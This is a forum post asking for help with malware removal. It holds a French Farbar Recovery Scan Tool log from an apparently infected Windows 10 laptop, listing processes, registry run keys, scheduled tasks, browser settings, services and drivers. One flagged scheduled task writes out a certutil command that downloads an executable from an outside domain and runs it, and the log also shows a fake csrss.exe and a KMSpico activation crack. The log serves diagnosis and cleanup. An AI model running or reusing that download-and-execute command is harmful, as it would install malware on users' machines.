INTERPRET FRST REPORT

Disinfection help for removing viruses, adware, ransomware and trojans.

Abelninon
Posts: 1
Joined: 09 Dec 2020 16:29

by Abelninon

Code:

Résultats d'analyse de  Farbar Recovery Scan Tool (FRST) (x64) Version: 09-12-2020
Exécuté par HP (administrateur) sur DESKTOP-GCFI703 (Hewlett-Packard HP EliteBook 840 G1) (09-12-2020 15:14:37)
Exécuté depuis C:\Users\HP\Downloads
Profils chargés: HP
Platform: Windows 10 Pro Version 1909 18363.1198 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

() [Fichier non signé] C:\oraclexe\app\oracle\product\10.2.0\server\BIN\TNSLSNR.EXE
() [Fichier non signé] C:\Users\HP\AppData\Local\Temp\csrss\wup\xarch\wup.exe
() [Fichier non signé] C:\Users\HP\AppData\Local\Temp\csrss\ww30.exe
() [Fichier non signé] C:\Windows\rss\csrss.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe <2>
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <34>
(Hewlett-Packard Company -> Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel(R) pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SecurityHealthHost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Windows Hardware Compatibility Publisher -> ) C:\Windows\System32\fpCSEvtSvc.exe
(Microsoft Windows Hardware Compatibility Publisher -> Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(MiniTool Software Limited -> ) C:\Program Files\MiniTool ShadowMaker\AgentService.exe
(MiniTool Software Limited -> ) C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
(MongoDB, Inc) [Fichier non signé] C:\Program Files\MongoDB\Server\4.2\bin\mongod.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Oracle Corporation) [Fichier non signé] C:\oraclexe\app\oracle\product\10.2.0\server\BIN\oracle.exe
(Protected Antivirus Limited -> TotalAV) C:\Program Files (x86)\TotalAV\SecurityService.exe
(Protected Antivirus Limited -> TotalAV) C:\Program Files (x86)\TotalAV\TotalAV.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.) C:\Windows\RtsCM64.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(VMware, Inc. -> ) C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
(VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
(VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
(VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Wondershare software CO., LIMITED -> Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [RtsCM] => C:\Windows\RTSCM64.EXE [225280 2017-03-09] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.)
HKLM\...\Run: [MTPW] => C:\Program Files\MiniTool Partition Wizard 12\updatechecker.exe [219616 2020-02-19] (MiniTool Software Limited -> )
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM-x32\...\Run: [MTSM] => C:\Program Files\MiniTool ShadowMaker\SMMonitor.exe [1060320 2019-12-12] (MiniTool Software Limited -> )
HKLM-x32\...\Run: [vmware-tray.exe] => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe [117680 2019-11-04] (VMware, Inc. -> VMware, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-16] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [BestZiper] => C:\Program Files (x86)\BestZip\BestZip.exe [1513472 2020-10-22] () [Fichier non signé]
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\Run: [Chromium] => "c:\users\hp\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\Run: [uTorrent] => C:\Users\HP\AppData\Roaming\uTorrent\uTorrent.exe [2113240 2020-11-28] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-10-22] (Adobe Inc. -> Adobe Systems Incorporated)
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\Run: [SummerFrost] => C:\Windows\rss\csrss.exe [4029952 2020-12-09] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\MountPoints2: {0bf5e1c5-b3a0-11ea-9208-801934321cdd} - "E:\HiSuiteDownLoader.exe" 
HKLM\...\Print\Monitors\HP c111 Status Monitor: C:\Windows\system32\hpinkstsc111LM.dll [333496 2012-12-16] (Hewlett Packard -> Hewlett-Packard Co.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.88\Installer\chrmstp.exe [2020-12-02] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\77.0.3865.90\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {09994AAF-DDF1-4B41-9494-555871D6531F} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://souffity.com/app/app.exe C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://souffity.com/app/app.exe C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {1518E5B3-9CE3-405C-89FF-37FCDDE3B71F} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [143712 2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {15FDC9F8-D147-4BA6-8D73-A3FC8535AD34} - System32\Tasks\Opera scheduled Autoupdate 1592151428 => C:\Users\HP\AppData\Local\Programs\Opera\launcher.exe
Task: {1809E38D-A98B-4D1A-B293-00CD2D6564F8} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)
Task: {1E1C72EE-A613-41CA-8BD6-18CE6E36D399} - System32\Tasks\HPCustParticipation HP Deskjet 1510 series => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPCustPartic.exe [5745672 2014-03-06] (Hewlett Packard -> Hewlett-Packard Co.)
Task: {29424055-15DD-4869-98DD-EC692D730D1A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1341008 2020-09-06] (Adobe Inc. -> Adobe Inc.)
Task: {336EB4B6-74A5-44F8-B0CF-54E566449D87} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2020-06-09] () [Fichier non signé]
Task: {42426DE4-FD4A-44D5-A005-65BDF0737243} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {6926EC8D-9B2D-4B3E-AF1A-61DE10EF0446} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4029952 2020-12-09] () [Fichier non signé] <==== ATTENTION
Task: {8614D6F5-47D6-4858-BB95-4EA01819CEBE} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {92F6DC21-6B71-4E03-8A4C-78274AD7A860} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [740544 2015-11-01] () [Fichier non signé]
Task: {A272E5E2-FF9E-4937-98DC-D76978522B7B} - System32\Tasks\Opera scheduled assistant Autoupdate 1592151434 => C:\Users\HP\AppData\Local\Programs\Opera\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\HP\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {A9D789F5-85A3-4D21-9BCC-B4DA25A68C12} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {AF1F10C1-1DF5-4776-9189-569DA6E4FC5C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5142960 2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {B0892B3E-9B5C-489C-BE6E-4DEE753C0F5B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B8B055CF-B2F1-4868-A26C-5E0C272D451F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {BC40A973-5FEE-4E51-AA12-6EE711FABF6D} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [143712 2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {CDB0FE8F-460D-4B7F-9732-58FE426E7526} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5142960 2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {D437B3DF-1713-4646-9B24-AC3DEB5B9620} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {EE5392C3-70C9-483C-87A8-88313616FAA2} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)
Task: {F4F300AB-CA3F-4008-B2CD-EA414D1ED1B3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F9A232A4-B576-43F5-BE88-BEBA1A937BBA} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [670928 2020-11-17] (Mozilla Corporation -> Mozilla Foundation)
Task: {FE36205F-4250-46F2-B42D-BACA3A176872} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe [65440 2020-06-10] (Microsoft Corporation -> Microsoft)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)


==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt
Tcpip\..\Interfaces\{1150ee4f-cb6e-47bf-8a78-4f462bc1d8f2}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{5970a743-2245-4f09-b25f-916888c97f63}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{91799e7c-16b1-48c8-8e9e-a9de85b60c72}: [DhcpNameServer] 192.168.0.1

Edge: 
======
DownloadDir: D:\Téléchargements
Edge HomeButtonPage: HKU\S-1-5-21-3974141972-1419997195-1840478993-1001 -> hxxp://www.surf-ma.com/
Edge DefaultProfile: Default
Edge Profile: C:\Users\HP\AppData\Local\Microsoft\Edge\User Data\Default [2020-12-09]
Edge DownloadDir: D:\Téléchargements
Edge Notifications: Default -> hxxps://www.facebook.com
Edge HomePage: Default -> hxxp://www.surf-ma.com/
Edge StartupUrls: Default -> "hxxp://www.surf-ma.com/"
Edge Extension: (Avast Online Security) - C:\Users\HP\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fdgpikaaheckgdijjmepmdjjkbceakif [2020-07-24]
Edge Extension: (McAfee® WebAdvisor) - C:\Users\HP\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fdhgeoginicibhagdmblfikbgbkahibd [2020-11-17]

FireFox:
========
FF DefaultProfile: ntwy0jos.default
FF ProfilePath: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\ntwy0jos.default [2020-07-27]
FF ProfilePath: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\a9s7su6g.default-release [2020-12-09]
FF Plugin: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-11-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-11-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.10 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-04-23] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2020-07-29] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2020-07-29] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-10-22] (Adobe Inc. -> Adobe Systems Inc.)

Chrome: 
=======
CHR Profile: C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default [2020-12-09]
CHR DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/search?fr=mcafee&type=E210FR91105G0&p={searchTerms}
CHR DefaultSearchKeyword: Default -> mcafee
CHR DefaultSuggestURL: Default -> hxxps://fr.search.yahoo.com/sugg/gossip/gossip-fr-partner?output=fxjson&appid=mca&source=yahoo_mcafee_searchassist&command={searchTerms}
CHR Extension: (Slides) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-06-11]
CHR Extension: (Docs) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-06-11]
CHR Extension: (Google Drive) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-23]
CHR Extension: (YouTube) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-06-11]
CHR Extension: (Adobe Acrobat) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-12-09]
CHR Extension: (Sheets) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-06-11]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2020-12-08]
CHR Extension: (Google Docs hors connexion) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-06-11]
CHR Extension: (Google Translate) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\phcmjjmajdnjjoafcdjccagdpmoemeaa [2020-12-09]
CHR Extension: (Gmail) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-23]
CHR Extension: (Chrome Media Router) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-20]
CHR Profile: C:\Users\HP\AppData\Local\Google\Chrome\User Data\System Profile [2020-12-07]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-11-23] (Microsoft Corporation -> Microsoft Corporation)
R2 fpCsEvtSvc; C:\Windows\system32\fpCSEvtSvc.exe [22528 2015-06-10] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [Fichier non signé]
S2 Main Service; C:\Program Files (x86)\MachinerData\OSFMount.exe [2557952 2020-12-09] () [Fichier non signé]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [955656 2020-11-21] (McAfee, LLC -> McAfee, LLC)
R2 MongoDB; C:\Program Files\MongoDB\Server\4.2\bin\mongod.exe [36280320 2020-05-21] (MongoDB, Inc) [Fichier non signé]
R2 MTAgentService; C:\Program Files\MiniTool ShadowMaker\AgentService.exe [776160 2019-12-12] (MiniTool Software Limited -> )
R2 MTSchedulerService; C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe [226784 2019-12-12] (MiniTool Software Limited -> )
S4 OracleJobSchedulerXE; c:\oraclexe\app\oracle\product\10.2.0\server\Bin\extjob.exe [102400 2006-02-02] () [Fichier non signé]
S3 OracleMTSRecoveryService; C:\oraclexe\app\oracle\product\10.2.0\server\BIN\omtsreco.exe [57616 2006-02-02] (Oracle Corporation) [Fichier non signé]
R2 OracleServiceXE; c:\oraclexe\app\oracle\product\10.2.0\server\bin\ORACLE.EXE [59064320 2006-02-02] (Oracle Corporation) [Fichier non signé]
S3 OracleXEClrAgent; C:\oraclexe\app\oracle\product\10.2.0\server\bin\OraClrAgnt.exe [45056 2006-02-02] () [Fichier non signé]
R2 OracleXETNSListener; C:\oraclexe\app\oracle\product\10.2.0\server\BIN\tnslsnr.exe [204800 2006-02-02] () [Fichier non signé]
R2 SecurityService; C:\Program Files (x86)\TotalAV\SecurityService.exe [275112 2020-11-26] (Protected Antivirus Limited -> TotalAV) <==== ATTENTION
S2 SecurityServiceMonitor; C:\Program Files (x86)\TotalAV\SecurityService.exe [275112 2020-11-26] (Protected Antivirus Limited -> TotalAV) <==== ATTENTION
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6153048 2020-11-18] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [740544 2015-11-01] () [Fichier non signé]
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [53248 2015-06-10] (Microsoft Windows Hardware Compatibility Publisher -> Synaptics Incorporated)
S3 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746504 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [15476144 2019-11-04] (VMware, Inc. -> )
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Pilotes (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35560 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
R3 e2eVAWdm; C:\Windows\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R1 HelpSrv; C:\Windows\helpsrv.sys [195424 2020-12-09] (福建六壬网安股份有限公司 -> HelpSrv Network) [Fichier non signé] [Fichier en cours d'utilisation]
R3 iVCam; C:\Windows\system32\DRIVERS\iVCam.sys [1089512 2020-04-04] (Shanghai Yitu Information Technology Co., Ltd. -> e2eSoft)
R1 npcap; C:\Windows\system32\DRIVERS\npcap.sys [83728 2020-08-25] (Insecure.Com LLC -> Insecure.Com LLC.)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2019-11-08] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12504 2019-11-08] (MiniTool Solution Ltd -> )
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166760 2020-04-24] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 VBoxNetAdp; C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys [239432 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\system32\DRIVERS\VBoxNetLwf.sys [249344 2020-10-16] (Oracle Corporation -> Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [174536 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 vmkbd3; C:\Windows\system32\DRIVERS\vmkbd.sys [52288 2019-11-04] (VMware, Inc. -> VMware, Inc.)
R2 VMnetBridge; C:\Windows\system32\DRIVERS\vmnetbridge.sys [66368 2019-11-04] (VMware, Inc. -> VMware, Inc.)
R0 vsock; C:\Windows\System32\DRIVERS\vsock.sys [103224 2019-08-14] (VMware, Inc. -> VMware, Inc.)
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-x64.sys [52576 2018-02-28] (VMware, Inc. -> VMware, Inc.)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
S3 wdm_usb; C:\Windows\system32\DRIVERS\usb2ser.sys [151184 2016-07-15] (NGO -> MBB)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R1 webshieldfilter; C:\Windows\System32\drivers\webshieldfilter.sys [96264 2020-05-29] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider) <==== ATTENTION
